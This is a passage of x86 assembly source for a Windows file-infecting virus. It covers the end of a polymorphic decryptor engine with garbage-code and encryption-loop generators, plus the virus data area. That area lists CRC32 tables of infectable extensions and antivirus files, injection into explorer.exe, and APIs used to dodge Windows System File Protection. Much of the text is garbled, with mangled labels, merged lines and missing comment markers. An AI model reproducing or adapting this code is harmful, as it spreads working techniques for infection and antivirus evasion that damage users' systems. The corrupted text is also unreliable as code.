MOV DWORD PTR [EBP LOOP_POINT], EDI
IS_NOT_LOOP: CALL GENGARBAGEEX
Call get_rnd32
And Al, 01H
JZ MutateCall
StandardCall: MOV Al, 0E8H; Call Opcode
Stosb
Lodsd
Sub Eax, EDI
Sub Eax, 00000004H
Stosd
JMP DonemutateCall
Callstepadd: MOV AX, 0C081H
OR AH, BYTE PTR [EBX REG_MASK]
Stosw
Lodsd
Call fromPoly2rva
Sub Eax, EDX
Stosd
RET
Callstepsub: MOV AX, 0E881H
OR AH, BYTE PTR [EBX REG_MASK]
Stosw
Lodsd
Call fromPoly2rva
NEG EAX
Add Eax, EDX
Stosd
RET
Callstepxor: MOV AX, 0F081H
OR AH, BYTE PTR [EBX REG_MASK]
Stosw
Lodsd
Call fromPoly2rva
XOR EAX, EDX
Stosd
RET
MUTATECALL: PUSH ESI
Call Get_Valid_reg
Or Byte Ptr [EBX REG_FLAGS], REG_READ_ONLY
MOV Al, 0B8H
OR Al, Byte PTR [EBX REG_MASK]
Stosb
Call get_rnd32
Stosd
Push EAX
Push EBX
Call Gengarbageex
POP EBX
MOV EAX, NumcallstepCall Get_rnd_Range
LEA ESI, DWORD PTR [EBP TBL_CALL_STEP EAX * 04H]
Lodsd
Add Eax, EBP
POP EDX
POP ESI
Push EBX
Call EAX
Call Gengarbageex
POP EBX
MOV AX, 0D0FFH
OR AH, BYTE PTR [EBX REG_MASK]
Stosw
XOR BYTE PTR [EBX REG_FLAGS], REG_READ_ONLY
DonemutateCall: Call GENGARBAGEX
Lodsd
POP ECX
Loop do_call
Call gengarbageex; end condition
Call gen_loop
Call gen_rnd_block
POP EBX
Push EDI
SUB EDI, DWORD PTR [EBP PTRTODECRYPT]
Push EDI
MOV EDI, DWORD PTR [EBP PTRTOCRYPT]
Add Edi, EBX
Call fixed_size2ecx; Encrypt Requested Area
LOOP_HIDE_CODE: PUSH ECX
MOV EAX, DWORD PTR [EDI]
Call perform_crypt
XOR ECX, ECX
MOV CL, BYTE PTR [EBP OPER_SIZE]
LOOP_COPY_RES: Stosb
SHR EAX, 08H
Loop loop_copy_res
POP ECX
Loop loop_hide_code
MOV EDX, DWORD PTR [EBP Entry_Point]
Sub EDX, EBX; Get Entry-Point Offset
POP ECX
POP EDI
RET
; ================================================== ===========================
Poly Engine Initialized Data
; ================================================== ===========================
; ================================================== ===========; Register Table
;
; 00h -> Byte -> Register Mask
; 01H -> BYTE -> Register Flags
; ================================================== ===========
TBL_REGS EQU $
DB 00000000B, REG_READ_ONLY; EAX
TBL_REG_EBX DB 00000011B, 00H; EBX
DB 00000001B, 00H; ECX
DB 00000010B, 00H; EDX
TBL_REG_ESI DB 00000110B, REG_NO_8BIT; ESI
TBL_REG_EDI DB 00000111B, REG_NO_8bit; EDI
TBL_REG_EBP DB 00000101B, REG_NO_8BIT; EBP
END_REGS EQU $
; ================================================== ===========
Aliases for REG TABLE STRUCTURE
; ================================================== ===========
REG_MASK EQU 00H
REG_FLAGS EQU 01H
; ================================================== ===========; Bit Aliases for REG FLAGS
; ================================================== ===========
REG_IS_INDEX EQU 01H; Register Used As Main Index Register
REG_IS_COUNTER EQU 02H; this Register IS Used As Loop Counter
REG_READ_ONLY EQU 04H; Never Modify The Value of this Register
REG_NO_8BIT EQU 08H; ESI EDI AND EBP HAVENT 8BIT VERSION
; ================================================== ===========
; Initial Reg Flags
; ================================================== ===========
TBL_STARTUP EQU $
DB REG_READ_ONLY; EAX
DB 00H; EBX
DB 00H; ECX
DB 00H; EDX
DB REG_NO_8bit; ESI
DB REG_NO_8bit; EDI
DB REG_NO_8bit; EBP
; ================================================== ===========; Code That Does Not Disturb Reg Values
; ================================================== ===========
TBL_SAVE_CODE EQU $
CLC
STC
CMC
CLD
STD
END_SAVE_CODE EQU $
; ================================================== ===========
Generators for [R] indexing mode
; ================================================== ===========
TBL_IDX_REG EQU $
DD Offset XX_INC_REG
DD Offset XX_DEC_REG
DD Offset XX_NOT_REG
DD Offset XX_ADD_REG
DD Offset XX_SUB_REG
DD offset xx_xor_reg
; ================================================== ===========; Generators for [REG IMM] indexing mode
; ================================================== ===========
TBL_DIS_REG EQU $
DD Offset YY_INC_REG
DD Offset YY_DEC_REG
DD Offset YY_NOT_REG
DD Offset YY_ADD_REG
DD Offset YY_SUB_REG
DD Offset YY_XOR_REG
; ================================================== ===========
Generators for [REG REG] INDEXING MODE
; ================================================== ===========
TBL_XTENDED EQU $
DD Offset ZZ_INC_REG
DD Offset ZZ_DEC_REG
DD Offset ZZ_NOT_REG
DD Offset ZZ_ADD_REG
DD Offset ZZ_SUB_REG
DD Offset ZZ_XOR_REG
; ================================================== ===========; GENERATORS for [REG REG IMM] indexing mode
; ================================================== ===========
TBL_PARANOIA EQU $
DD Offset II_INC_REG
DD Offset II_DEC_REG
DD Offset II_NOT_REG
DD Offset II_ADD_REG
DD Offset II_SUB_REG
DD Offset II_XOR_REG
; ================================================== ===========
Opcodes for Math Reg, IMM
; ================================================== ===========
TBL_MATH_IMM EQU $
DB 0C0H; Add
DB 0C8H; OR
DB 0E0H; And
DB 0E8H; SUB
DB 0F0H; xor
DB 0D0H; ADC
DB 0D8H; SBB
END_MATH_IMM EQU $
; ================================================== ===========; Magic Aliases
; ================================================== ===========
Magic_putKey EQU 01H
Magic_putdisp EQU 02H
Magic_ENDSTR EQU 0FFH
Magic_ENDKEY EQU 0FEH
Magic_careebp EQU 00H
Magic_notebp EQU 0FFH
; ================================================== ===========
Magic Data
; ================================================== ===========
XX_INC_REG DB 0FEH
DB Magic_Careebp
DB 00H
DB 00H
DD Offset X_INC_REG_BYTE
DD Offset X_INC_REG_WORD
DD Offset X_INC_REG_DWORD
XX_DEC_REG DB 0FEH
DB Magic_Careebp
DB 08H
DB 00H
DD Offset X_Dec_reg_byte
DD Offset X_Dec_reg_word
DD Offset X_Dec_reg_dword
XX_NOT_REG DB 0F6H
DB Magic_Careebp
DB 10h
DB 00H
DD Offset X_Not_Reg_Byte
DD offset x_not_reg_word
DD OFFSET X_NOT_REG_DWORDXX_ADD_REG DB 80H
DB Magic_Careebp
DB 00H
DB Magic_putKey
DD Offset X_Add_reg_byte
DD offset x_add_reg_word
DD offset x_add_reg_dword
XX_SUB_REG DB 80H
DB Magic_Careebp
DB 28h
DB Magic_putKey
DD Offset X_Sub_Reg_Byte
DD Offset X_Sub_Reg_Word
DD Offset X_Sub_Reg_dword
XX_XOR_REG DB 80H
DB Magic_Careebp
DB 30h
DB Magic_putKey
DD offset x_xor_reg_byte
DD offset x_xor_reg_word
DD offset x_xor_reg_dword
YY_INC_REG DB 0FEH
DB MAGIC_NOTEBP
DB 80h
DB Magic_putdisp
DD Offset X_INC_REG_BYTE
DD Offset X_INC_REG_WORD
DD Offset X_INC_REG_DWORD
YY_DEC_REG DB 0FEH
DB MAGIC_NOTEBP
DB 88H
DB Magic_putdisp
DD Offset X_Dec_reg_byte
DD Offset X_Dec_reg_word
DD Offset X_Dec_reg_dword
YY_NOT_REG DB 0F6H
DB MAGIC_NOTEBP
DB 90h
DB Magic_putdisp
DD Offset X_Not_Reg_Byte
DD offset x_not_reg_word
DD Offset X_Not_Reg_dword
YY_ADD_REG DB 80H
DB MAGIC_NOTEBP
DB 80h
DB MAGIC_PUTKEY or MAGIC_PUTDISP
DD Offset X_Add_reg_byte
DD offset x_add_reg_word
DD offset x_add_reg_dword
YY_SUB_REG DB 80H
DB MAGIC_NOTEBP
DB 0A8H
DB MAGIC_PUTKEY or MAGIC_PUTDISP
DD Offset X_Sub_Reg_Byte
DD Offset X_Sub_Reg_Word
DD Offset X_Sub_Reg_dword
YY_XOR_REG DB 80H
DB MAGIC_NOTEBP
DB 0B0H
DB MAGIC_PUTKEY or MAGIC_PUTDISP
DD offset x_xor_reg_byte
DD offset x_xor_reg_word
DD offset x_xor_reg_dword
ZZ_INC_REG DB 0FEH
DB Magic_Careebp
DB 04H
DB 00H
DD Offset X_INC_REG_BYTE
DD Offset X_INC_REG_WORD
DD Offset X_INC_REG_DWORD
ZZ_DEC_REG DB 0FEH
DB Magic_Careebp
DB 0CH
DB 00H
DD Offset X_Dec_reg_byte
DD Offset X_Dec_reg_word
DD Offset X_Dec_reg_dword
ZZ_NOT_REG DB 0F6H
DB Magic_Careebp
DB 14h
DB 00H
DD Offset X_Not_Reg_Byte
DD offset x_not_reg_word
DD Offset X_Not_Reg_dword
ZZ_ADD_REG DB 80HDB MAGIC_CAREBP
DB 04H
DB Magic_putKey
DD Offset X_Add_reg_byte
DD offset x_add_reg_word
DD offset x_add_reg_dword
ZZ_SUB_REG DB 80H
DB Magic_Careebp
DB 2ch
DB Magic_putKey
DD Offset X_Sub_Reg_Byte
DD Offset X_Sub_Reg_Word
DD Offset X_Sub_Reg_dword
ZZ_XOR_REG DB 80H
DB Magic_Careebp
DB 34H
DB Magic_putKey
DD offset x_xor_reg_byte
DD offset x_xor_reg_word
DD offset x_xor_reg_dword
II_INC_REG DB 0FEH
DB MAGIC_NOTEBP
DB 84H
DB Magic_putdisp
DD Offset X_INC_REG_BYTE
DD Offset X_INC_REG_WORD
DD Offset X_INC_REG_DWORD
II_DEC_REG DB 0FEH
DB MAGIC_NOTEBP
DB 8ch
DB Magic_putdisp
DD Offset X_Dec_reg_byte
DD Offset X_Dec_reg_word
DD Offset X_Dec_reg_dword
II_NOT_REG DB 0F6H
DB MAGIC_NOTEBP
DB 94H
DB Magic_putdisp
DD Offset X_Not_Reg_Byte
DD offset x_not_reg_word
DD Offset X_Not_Reg_dword
II_ADD_REG DB 80H
DB MAGIC_NOTEBP
DB 84H
DB MAGIC_PUTKEY or MAGIC_PUTDISP
DD Offset X_Add_reg_byte
DD offset x_add_reg_word
DD offset x_add_reg_dword
II_SUB_REG DB 80H
DB MAGIC_NOTEBP
DB 0ch
DB MAGIC_PUTKEY or MAGIC_PUTDISP
DD Offset X_Sub_Reg_Byte
DD Offset X_Sub_Reg_Word
DD Offset X_Sub_Reg_dword
II_XOR_REG DB 80H
DB MAGIC_NOTEBP
DB 0B4H
DB MAGIC_PUTKEY or MAGIC_PUTDISP
DD offset x_xor_reg_byte
DD offset x_xor_reg_word
DD offset x_xor_reg_dword
; ================================================== ===========
Reverse-Code Strings
; ================================================== =========== x_inc_reg_byte DB 02H, 0FEH, 0C8H, MAGIC_ENDSTR
X_INC_REG_WORD DB 02H, 66H, 48H, Magic_ENDSTR
X_INC_REG_DWORD DB 01H, 48H, MAGIC_ENDSTR
X_DEC_REG_BYTE DB 02H, 0FEH, 0C0H, MAGIC_ENDSTR
X_DEC_REG_WORD DB 02H, 66H, 40H, MAGIC_ENDSTR
X_DEC_REG_DWORD DB 01H, 40H, MAGIC_ENDSTR
X_Not_Reg_Byte DB 02H, 0F6H, 0D0H, Magic_ENDSTR
X_Not_Reg_word DB 03H, 66H, 0F7H, 0D0H, Magic_ENDSTR
X_NOT_REG_DWORD DB 02H, 0F7H, 0D0H, MAGIC_ENDSTR
X_ADD_REG_BYTE DB 01H, 2CH, MAGIC_ENDKEY
X_add_reg_word DB 02H, 66H, 2DH, MAGIC_ENDKEY
X_add_reg_dword DB 01H, 2DH, MAGIC_ENDKEY
X_SUB_REG_BYTE DB 01H, 04H, MAGIC_ENDKEY
X_SUB_REG_WORD DB 02H, 66H, 05H, MAGIC_ENDKEY
X_SUB_REG_DWORD DB 01H, 05H, MAGIC_ENDKEY
X_XOR_REG_BYTE DB 01H, 34H, MAGIC_ENDKEY
X_XOR_REG_WORD DB 02H, 66H, 35H, Magic_ENDKEY
X_XOR_REG_DWORD DB 01H, 35H, Magic_ENDKEY
; ================================================== ===========
Format for Each Style-Table Entry:
;
; 00h -> DWORD -> Address of Generator
; 04H -> DWORD -> Address of generated subs
; 00000000H IF not yet generated
;
; ================================================== =========== STYLE_TABLE EQU $
DD Offset Gen_Load_ptr
DD 00000000h
DD Offset Gen_Load_ctr
DD 00000000h
DD Offset Gen_Decrypt
DD 00000000h
DD Offset Gen_Next_Step
DD 00000000h
DD offset gen_next_ctr
DD 00000000h
; ================================================== ===========
Generators for Incrementing The Index Register
; ================================================== ===========
TBL_IDX_UP EQU $
DD Offset IDXUPWITHADD
DD Offset IDXUPWITHSUB
DD Offset IDXUPWithinc
DD Offset IDXUpAddadd
DD Offset IDXUpAddsub
DD Offset IDXUpsubsub
DD Offset IDXUpsubadd
Numidxup EQU ($ -TBL_IDX_UP) / 04H
; ================================================== ===========
Misc generators
; ================================================== =========== TBL_JMP_END EQU $
DD Offset JMpendREGADD
DD Offset JMpendRegsub
DD Offset JMpendRegxor
Numjmpend EQU ($ -TBL_JMP_END) / 04H
TBL_CALL_STEP EQU $
DD Offset Callstepadd
DD Offset Callstepsub
DD Offset Callstepxor
Numcallstep EQU ($ -TBL_CALL_STEP) / 04H
TBLDOFOG EQU $
DD Offset DofogAdd
DD Offset Dofogsub
DD Offset DofogXor
Numfog EQU ($ -TBLDOFOG) / 04H
TBLFIXFOG EQU $
DD Offset FixfogAdd
DD Offset Fixfogsub
DD Offset Fixfogxor
Numfixfog EQU ($ -TBLFIXFOG) / 04H
; ================================================== ===========
Generators for Decrementing The Index Register
; ================================================== ===========
TBL_IDX_DOWN EQU $
DD Offset IDXDownwithadd
DD Offset IDXDownWithSub
DD Offset IDXDOWNDEC
DD Offset IDXDOWNADDADDDDDDDD
DD Offset IDXDSUB
DD Offset IDXDownsubsub
DD Offset IDXDOWNSUBADD
NumIDXDown EQU ($ -TBL_IDX_DOWN) / 04H
; ================================================== ===========; Garbage Code Generators
; ================================================== ===========
TBL_I_G EQU $
DD Offset Gen_Save_code; CLC STC CMC CLD STD
DD offset gen_mov_mem32; MOV MEM, REG32
DD offset gen_mov_mem16; MOV MEM, REG16
DD offset gen_mov_mem8; MOV MEM, REG8
DD offset gen_add_mem32; add mem, reg32
DD offset gen_add_mem16; add mem, reg16
DD offset gen_add_mem8; add mem, reg8
DD offset gen_sub_mem32; SUB MEM, REG32
DD Offset Gen_Sub_mem16; Sub Mem, REG16
DD offset gen_sub_mem8; Sub Mem, Reg8
DD offset gen_adc_mem32; adc MEM, REG32
DD offset gen_adc_mem16; adc MEM, REG16
DD offset gen_adc_mem8; adc Mem, Reg8
DD Offset Gen_SBB_MEM32; SBB MEM, REG32
DD Offset Gen_SBB_MEM16; SBB MEM, REG16
DD Offset Gen_SBB_MEM8; SBB MEM, REG8
DD offset gen_or_mem32; or mem, reg32
DD offset gen_or_mem16; or mem, reg16
DD offset gen_or_mem8; or mem, reg8
DD offset gen_and_mem32; and mem, reg32
DD offset gen_and_mem16; and mem, reg16
DD offset gen_and_mem8; and mem, reg8
DD offset gen_xor_mem32; xor Mem, Reg32
DD offset gen_xor_mem16; xor Mem, Reg16
DD Offset Gen_xor_mem8; xor Mem, Reg8
END_I_G EQU $
TBL_GARBAGE EQU $
DD Offset Gen_Save_code; CLC STC CMC CLD STD
DD Offset G_MovReg32Immm; Mov Reg32, IMM
DD Offset G_MovReg16Immm; Mov Reg16, Immdd Offset G_Movreg8 IMM; MOV REG8, IMM
DD Offset g_xchgregreg32; xchg reg32, reg32
DD Offset g_xchgregreg16; xchg reg16, reg16
DD offset g_xchgregream; xchg reg8, reg8
DD Offset G_MovRegreg32; Mov Reg32, Reg32
DD Offset G_Movregreg16; Mov Reg16, Reg16
DD Offset G_MovRegReg8; Mov Reg8, REG8
DD Offset G_inc_Reg32; Inc REG32
DD offset g_inc_reg16; increg16
DD Offset G_inc_Reg8; Inc REG8
DD Offset G_Dec_reg32; Dec Reg32
DD OFFSET G_DEC_REG16; DEC REG16
DD Offset G_Dec_reg8; Dec Reg8
DD Offset G_MathRegimm32; Math REG32, IMM
DD Offset G_MathRegimm16; Math Reg16, IMM
DD Offset G_MathRegimm8; Math REG8, IMM
DD Offset G_Movzx_movsx; Movzx / Movsx Reg32, Reg16
Save_space EQU $
DD offset gen_mov_mem32; MOV MEM, REG32
DD offset gen_mov_mem16; MOV MEM, REG16
DD offset gen_mov_mem8; MOV MEM, REG8
DD offset gen_add_mem32; add mem, reg32
DD offset gen_add_mem16; add mem, reg16
DD offset gen_add_mem8; add mem, reg8
DD offset gen_sub_mem32; SUB MEM, REG32
DD Offset Gen_Sub_mem16; Sub Mem, REG16
DD offset gen_sub_mem8; Sub Mem, Reg8
DD offset gen_adc_mem32; adc MEM, REG32
DD offset gen_adc_mem16; adc MEM, REG16
DD offset gen_adc_mem8; adc Mem, Reg8
DD Offset Gen_SBB_MEM32; SBB MEM, REG32
DD Offset Gen_SBB_MEM16; SBB MEM, REG16
DD Offset Gen_SBB_MEM8; SBB MEM, REG8
DD offset gen_or_mem32; or mem, reg32
DD offset gen_or_mem16; or mem, reg16
DD offset gen_or_mem8; or mem, reg8
DD offset gen_and_mem32; and mem, reg32
DD offset gen_and_mem16; and mem, reg16
DD offset gen_and_mem8; and mem, reg8
DD offset gen_xor_mem32; xor Mem, Reg32
DD offset gen_xor_mem16; xor Mem, Reg16
DD Offset Gen_xor_mem8; xor Mem, Reg8
DD Offset g_push_g_pop; Push REG / GARBAGE / POP REG
DD OFFSET G_CALL_CONT; CALL / GARBAGE / POP
DD OFFSET G_JUMP_U; JUMP / RND BlockddDDDDD G_Jump_c; Jump Conditional / Garbage
DD offset gen_fake_crypt; fake decryptor instruction
END_GARBAGE EQU $
; ================================================== ===========
Polypush
; ================================================== ===========
TBLDOPUSH EQU $
Pushebx DB 053H
Pushesi DB 056H
Pushedi db 057h
Pushebp DB 055H
; ================================================== ===========
Polypop
; ================================================== ===========
TBLDOPOP EQU $
Popebx db 05dh
POPESI DB 05FH
Popedi DB 05EH
Popebp db 05bh
; ================================================== ===========================; CRC32 of API Names
; ================================================== ===========================
CRCKERNEL32 DD 00000000H; CRC32 of Kernel DLL NAME
CRCGetProcaddr DD 00000000h; this API Takes Special Care
CRC32K32APIS DD NUMK32APIS DUP (00000000H)
CRC32TOOLHELPAPIS DD NUMTOOLHELPAPIPIPIPIP (00000000H)
CRC32PSAPIAPIAPIAPIAPIAPIAPIAPIAPIAPIAPIAPIAPIAPIAPIAPIAPIAPIAPIAPIAPIAPIS DUP (00000000H)
CRC32IMGHLPAPIS DD NUMIMGHLPAPIS DUP (00000000H)
CRC32SFCAPIS DD NUMSFCAPIS DUP (00000000H)
CRC32USER32APISW9X DD NUMUSER32APIS DUP (00000000H)
CRC32USER32APISWNT DD NUMUSER32APIS DUP (00000000H)
CRC32_ISDEBUGPR DD 00000000H
CRC32_REGSERVPROC DD 00000000H
; ================================================== ===========================
; CRC32 of Infectable File Extensions
; ================================================== ============================ tc 3c 3
CRC32_SZEXE DD 00000000H
CRC32_SZSCR DD 00000000H
CRC32_SZCPL DD 00000000H
Numberofext EQU ($ -TBLCRC32SZEXT) / 04H
; ================================================== ===========================
CRC32 of Explorer.exe and user32.dll
; ================================================== ===========================
CRCSZEXPLORER DD 00000000H
CRCSZUSER32 DD 00000000H
CRCSZPSAPI DD 00000000H
CRCSZIMGHLP DD 00000000H
CRCSZSFC DD 00000000H
; ================================================== ============================; Avoid Some Files from Being Infected
; ================================================== ===========================
Avoid_TBL DD Avoid_Num DUP (00000000H)
; ================================================== ===========================
; CRC32 OF AV FILES
; ================================================== ===========================
TBLCRC32AV DD Numberofav DUP (00000000H)
; ================================================== ===========================; End of crc32 protected area
; ================================================== ===========================
SizeOfProtect EQU $ -Crc_Protace
; ================================================== ===========================
; End of Virus Image In Files
; ================================================== ===========================
INF_SIZE EQU $ -Viro_SYS
; ================================================== ===========================; Seed for Random Number Generator
; ================================================== ===========================
RND32_SEED DD 00000000H
; ================================================== ===========================
; CRC32 lookup Table
; ================================================== ===========================
TBL_CRC32 DD 0100H DUP (00000000H)
; ================================================== ===========================; kernel32 API's
; ================================================== ===========================
; GetProcaddress API Takes Special Care
A_GETPROCADDRESS DD 00000000H
EPK32APIS EQU $
A_createfilea DD 00000000H
A_createfilemappinga DD 00000000H
A_createProcessa DD 00000000H
a_createthread dd 00000000H
a_closehandle dd 00000000h
A_Deletefilea DD 00000000H
a_exitthread dd 00000000H
A_FindClose DD 00000000H
a_findfirstfilea dd 00000000h
A_FindNextFilea DD 00000000H
A_FREELIBRARY DD 00000000H
A_GetComputernamea DD 00000000H
A_GetcurrentProcess DD 00000000H
A_GetDriveTypea DD 00000000H
A_GETFileAttributesa DD 00000000H
A_GetLastError DD 00000000H
A_GETLOCALTIME DD 00000000H
A_GETLOGICALDRIVESTRINGSA DD 00000000H
A_GetsystemDirectorya DD 00000000H
A_GETVERSIONEX DD 00000000H
A_LoadLibrarya DD 00000000H
A_mapviewoffile dd 00000000H
a_openfilemappinga dd 00000000h
A_OpenProcess DD 00000000H
A_ReadProcessMemory DD 00000000H
a_setendoffile dd 00000000h
A_setfileAttributesa DD 00000000H
a_setfilepointer dd 00000000h
A_setFileTime DD 00000000ha_Sleep DD 00000000H
a_unmapviewoffile dd 00000000h
A_WriteProcessMemory DD 00000000H
Numk32apis EQU ($ -EPK32APIS) / 04H
Only Used When Present
A_IndebuggerPresent DD 00000000h
Hkernel32 DD 00000000H
; ================================================== ===========================
Used to Check Current Computer Name
; ================================================== ===========================
SizeOfComputername DD 00000000H
Szcomputername DB 20H DUP (00h)
; ================================================== ===========================
Buffer Used On Misc Routines
; ================================================== ================================================================================================================================================================================= ptes DD 00000000H
BUFSTRFILENAME DB MAX_PATH 01H DUP (00000000H)
; ================================================== ===========================
; End of Virus Virtual Image
; ================================================== ===========================
SIZE_VIRTUAL EQU $ -Viro_sys
; ================================================== ===========================
Structure Used by getversionex
; ================================================== ==================================================================================================================================================================================
DWOSVERSIONFOSIZE DD 00000000H
DWmajorversion DD 00000000H
DWMINORVERSION DD 00000000H
DWBUILDNUMBER DD 00000000H
DWPLATFORMID DD 00000000H
SZCSDVERSION DB 80H DUP (00h)
VER_PLATFORM_WIN32S EQU 00H
VER_PLATFORM_WIN32_WINDOWS EQU 01H
VER_PLATFORM_WIN32_NT EQU 02H
; ================================================== ===========================
Variables use by the windows 9x residency routines
; ================================================== ===========================
HSnapshot DD 00000000H
Processentry EQU $
ProcedWsize DD 00000000H
Procecntusage DD 00000000H
Proceth32Processid DD 00000000H
Proceth32Defaultheapid DD 00000000H
Proceth32ModuleID DD 00000000H
Procecntthreads DD 00000000H
Proceth32ParentProcessid DD 00000000HProcepcpriclesBase DD 00000000H
Procedwflags DD 00000000H
Proceszexefile DB Max_Path DUP (00h)
SizeOfProcesSsentry EQU ($ -ProcesSsentry)
ModuleEntry EQU $
Modedwsize DD 00000000H
Modeth32ModuleID DD 00000000H
Modeth32Processid DD 00000000H
Modeglblcntusage DD 00000000H
ModeProccntusage DD 00000000H
ModemodBaseAddr DD 00000000H
Modemodbasesize DD 00000000h
ModehModule DD 00000000H
MODESZMODULE DB MAX_MODULE_NAME32 1 DUP (00h)
MODESZEXEPATH DB MAX_PATH DUP (00h)
SizeOfmoduleEntry EQU ($ -ModuleEntry)
MAX_MODULE_NAME32 EQU 255
; ================================================== ===========================
Variables use by the windows NT and Windows 2000 Residency Routines
; ================================================== ===========================
HProcess DD 00000000H
HModule DD 00000000H
ProcessidList DD 20H DUP (00000000H)
ModuleList DD 20H DUP (00000000H)
Explorer_mz_lfaNew DD 00000000H
Explorer_fh_sizeofoptionalHeader DW 0000h
Explorer_fh_numberofsections dw 0000h
Explorer_sectionHeader DB image_sizeof_section_Header DUP (00h)
Explorer_DE_IMPORT DD 00000000HEXPLORER_IMPORTDESCRIPTOR DB image_sizeof_import_descriptor DUP (00h)
Explorer_id_name DB 10h DUP (00h)
PARSEDLNAMEERRORPROTECTION DB 00H
Explorer_Hook DD 00000000H
Explorer_patch dd 00000000H
Explorer_init_hook DD 00000000H
; ================================================== ===========================
; This is virus infection thread ID
; ================================================== ===========================
IF_threadid DD 00000000H
; ================================================== ===========================
This is used to locate system dll files and loading the usout using names,
Only by Means of CRC32
; ================================================== ============================================================================== a_SDLL_CRC32 DD 00000000h
SzsystemDir DB MAX_PATH DUP (00h)
; ================================================== ===========================
; Toolhelp API's (Windows 9x Only)
; ================================================== ===========================
Eptool Helpapis Equ $
a_createtoolhelp32snapshot dd 00000000H
A_Process32First DD 00000000H
A_Process32Next DD 00000000H
A_Module32First DD 00000000H
A_Module32Next DD 00000000H
NumTool Helpapis EQU ($ -eptoolhelpapis) / 04H
; ================================================== ===========================; PSAPI API's (Windows NT & Windows 2000 ONLY)
; ================================================== ===========================
Eppsapiapis Equ $
A_enumprocessModules DD 00000000H
A_enumprocesses DD 00000000H
A_GETMODULEBASENAMEA DD 00000000H
A_GETMODULINFORMATION DD 00000000H
Numpsapiapis EQU ($ -Eppsapiapis) / 04H
HPSAPI DD 00000000H
; ================================================== ===========================
; ImageHLP APIS Used to Compute New Image Checksum
; ================================================== =========================== Epimghlpapis EQU $
a_checksummappedfile dd 00000000h
NumImghlPapis EQU ($ -epImghlpapis) / 04H
HIMGHLP DD 00000000H
; ================================================== ===========================
; SFC APIS Used by the Virus to Avoid Windows 2000 System File Protection
; ================================================== ===========================
EPSFCAPIS EQU $
a_sfcisfileprotected dd 00000000h
NUMSFCAPIS EQU ($ -epsfcapis) / 04H
HSFC DD 00000000H
; ================================================== ===========================; user32 apis (the address is for the ansi versioniffness if the target is running
Windows 9x or The Wide Version if Running Windows NT).
; ================================================== ===========================
EPUSER32APIS EQU $
A_DEFWINDOWPROC DD 00000000H
Numuser32apis EQU ($ -epuser32apis) / 04H
HUSER32 DD 00000000H
; ================================================== ===========================
Handles over Target Files
; ================================================== =========================== h_createfile dd 00000000H
H_FileMap DD 00000000H
; ================================================== ===========================
Misc Variables
; ================================================== ===========================
CurfileAttr DD 00000000H
Checksumpe DD 00000000H
Oldchecksum DD 00000000H
Map_is_here dd 00000000h
FileImport DD 00000000H
Importsh DD 00000000H
INJECT_OFFS DD 00000000H
Vir_offset DD 00000000H
Search_Raw DD 00000000H
Host_Base DD 00000000H
Virus_sh dd 00000000H
FIX_SIZE DD 00000000H
Raw_align DD 00000000H
K32codestart DD 00000000H
K32CODEEND DD 00000000H
; ================================================== ===========================; Poly Engine Uninitialized Data
; ================================================== ===========================
Crypt_direction EQU 01H
Crypt_cmpctr EQU 02H
Crypt_cdir EQU 04H
Crypt_simplex EQU 10H
Crypt_complex EQU 20H
Crypt_fog EQU 40h
PTRTOCRYPT DD 00000000H; Pointer To Area to Encrypt
PTRTODECRYPT DD 00000000H; WHERE to Generate Polymorphic Decryptor
PTRToEP DD 0000000000H; Pointer to Code Entry-Point ONCE DECRYPTED
Sizecrypt DD 0000000000; Size of Area To Encrypt
End_Value DD 0000000000; Index End Value
LOOP_POINT DD 00000000H; Start Address of Decryption Loop
Entry_Point DD 0000000000; Entry Point To Decryptor Code
Decryptor_size DD 00000000H; Size of Generated Decryptor
Disp2disp DD 00000000H; Displacement over Displacement
Condition_ptr DD 00000000H; Pointer to JZ / JNZ INSTRUCTION AT LOOP END
XRND1 DD 00000000H
XrndReg DD 00000000H
XRndFixPtr DD 00000000H
XrndMath DD 00000000H
Counter_mask db 00h; Mask of Register Used As Counter
Recursive_level db 00h; Garbage Recursive Layer
IsFirst DB 00H; Save Registers Only on 1st Decryptorfake_field EQU $
PTR_DISP DD 00000000H; Displacement from Index
FAKE_PTR_DISP DD 00000000h; ... And fake one
Crypt_key DD 0000000000; Encryption Key
FAKE_CRYPT_KEY DD 00000000h; ... and fake one
Build_Flags DB 00H; Some Decryptor Flags
FAKE_BUILD_FLAGS DB 00H; ... and fake?
Oper_size db 00h; size used (1 = byte 2 = word 4 = DWORD)
FAKE_OPER_SIZE DB 00H; ... And Fake ONE
Index_mask db 00h; Mask of Register Used As Index
FAKE_INDEX_MASK DB 00H; ... and fake one
TBLSTDPSHP EQU $
DD 00000000h
DD 00000000h
DD 00000000h
DD 00000000h
PSHPSTEPINDEX DD 00000004H DUP (00000000H)
Num_da EQU 10H
NumberofDataAareas DB 00H
TBL_DATA_AREA DB NUM_DA * 08H DUP (00h)
; ================================================== ===========================
SystemTIME STRUCTURE Used by getLocaltime
; ================================================== ===========================
Local_time EQU $
LT_Year DW 0000h
LT_MONTH DW 0000H
LT_dayofweek dw 0000h
LT_day dw 0000h
LT_HOUR DW 0000h
LT_MINUTE DW 0000H
LT_second dw 0000h
LT_MilliseConds DW 0000h
; ================================================== ===========================; a Rect structure used in the payload
; ================================================== ===========================
WindowRect EQU $
WR_LEFT DD 0000000000h
WR_TOP DD 0000000000h
WR_Right DD 00000000H
WR_BOTTOM DD 00000000H
; ================================================== ===========================
; This is a Win32 Finddata Structure Used to Infect Files, And Some
AUXILIARY VARIABLES
; ================================================== =================================== FileSizeOnDisk DD 00000000H
FATSIZE DD 00000000H
FT_CREATIONTIME DB 08H DUP (00h)
FT_LASTACCESSTIME DB 08H DUP (00h)
FT_LASTWRITIME DB 08H DUP (00h)
H_find DD 00000000H
DirectFindData DB sizeOf_win32_find_data dup (00h)
; ================================================== ===========================
Used to Retrieve Current, Windows and System DirectorIES, WINDOWS AND SYSTEM DIRECTORIES
; ================================================== ===========================
BUFGETDIR DB MAX_PATH 01H DUP (00000000H)
; ================================================== ===========================; use to get Logical Drives
; ================================================== ===========================
Sizeof_ldsb Equ Max_path
SzlogicalDrives DB SizeOf_ldsb DUP (00000000H)
; ================================================== ===========================
; End of Virus Image IN Allocated Memory
; ================================================== ===========================
Alloc_size EQU $ -Viro_sys
Virseg Ends
End host_code
